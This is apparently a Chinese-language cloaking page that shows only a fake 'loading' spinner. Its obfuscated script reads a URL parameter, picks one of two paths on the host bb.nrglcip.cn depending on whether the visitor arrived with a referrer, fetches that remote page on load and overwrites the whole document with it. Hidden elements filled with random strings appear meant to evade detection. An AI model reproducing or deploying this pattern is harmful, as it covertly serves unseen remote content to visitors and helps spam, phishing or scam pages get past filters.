<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .BKjwER3Adx {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .BKjwER3Adx .tUM6PGm7 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .BKjwER3Adx .content {
            line-height: 50px;
            text-align: center
        }

        .BKjwER3Adx .img {
            width: 100%
        }

        .BKjwER3Adx .YzTUgClIWd {
            text-align: center
        }

        .BKjwER3Adx .YzTUgClIWd span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .BKjwER3Adx .YzTUgClIWd span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .BKjwER3Adx .YzTUgClIWd span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .BKjwER3Adx .YzTUgClIWd span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .BKjwER3Adx .YzTUgClIWd span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .BKjwER3Adx .YzTUgClIWd span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .BKjwER3Adx .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function RlLSENFU6S(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var gP6py = RlLSENFU6S('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ gP6py +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ gP6py +".html?a=share";
		}
		
        ErzTzGbA=url+"#"+new Date().getTime();
        ErzTzGbA && function() {
            $.get(ErzTzGbA, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>wK3mSVunbubQNMKXQrksfNyiGiEmzxkgfxLojjXuXS2axUINpgf8DBYi0TwLSg4xWtOn3K30wGDCWk9LGQ6cTmzmXPFukG</div>
<ul style='display:none' >SqfwAHfobNM0UGWQ0W9SrA9mExNQQEbBYwZShp2d3e8YMJS1mbFt</ul>
<span style='display:none'>hgEdpAkXkGKtCCNffI43D1mEph3oFT3zqVYAXp2euxsd92</span>
<b style='display:none' >XEk25DYcPQejW0EI9ukp8N51wlwfShzy3ZEJ5a7CdugArIMfm</b>
<ul style='display:none' >SqfwAHfobNM0UGWQ0W9SrA9mExNQQEbBYwZShp2d3e8YMJS1mbFt</ul>
<b style='display:none' >XEk25DYcPQejW0EI9ukp8N51wlwfShzy3ZEJ5a7CdugArIMfm</b>
<img  src='' style='display:none'>
<img  src='' style='display:none'><div class="BKjwER3Adx">
    <div class="tUM6PGm7">
        <div class="YzTUgClIWd">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>Z4zISLgN9YlHQxkAh3SeCqphE76RcT2QpbxHC6qB8efwYz3GVCZ2HUnxcAJeGbqXaQrdU</p>
<h1 style='display:none' >UOwISTodEOdJ1FwNKR9W1F3faruBweHnWeZtUY5</h1>
<img  src='' style='display:none'>
<span style='display:none'>tLlb0tQOcd9G</span>
<li style='display:none' >AZE4jXasAuloKlWZGSFURc2LxWdSn76Uqjv1zHwJLejHSlW88BBcjMsDyUECLR4kP0RpDRFFcjuMQENtjcRfT8ymcBvoSG</li>
<b style='display:none' >lTmXnneGB4M3N</b></body>
</html>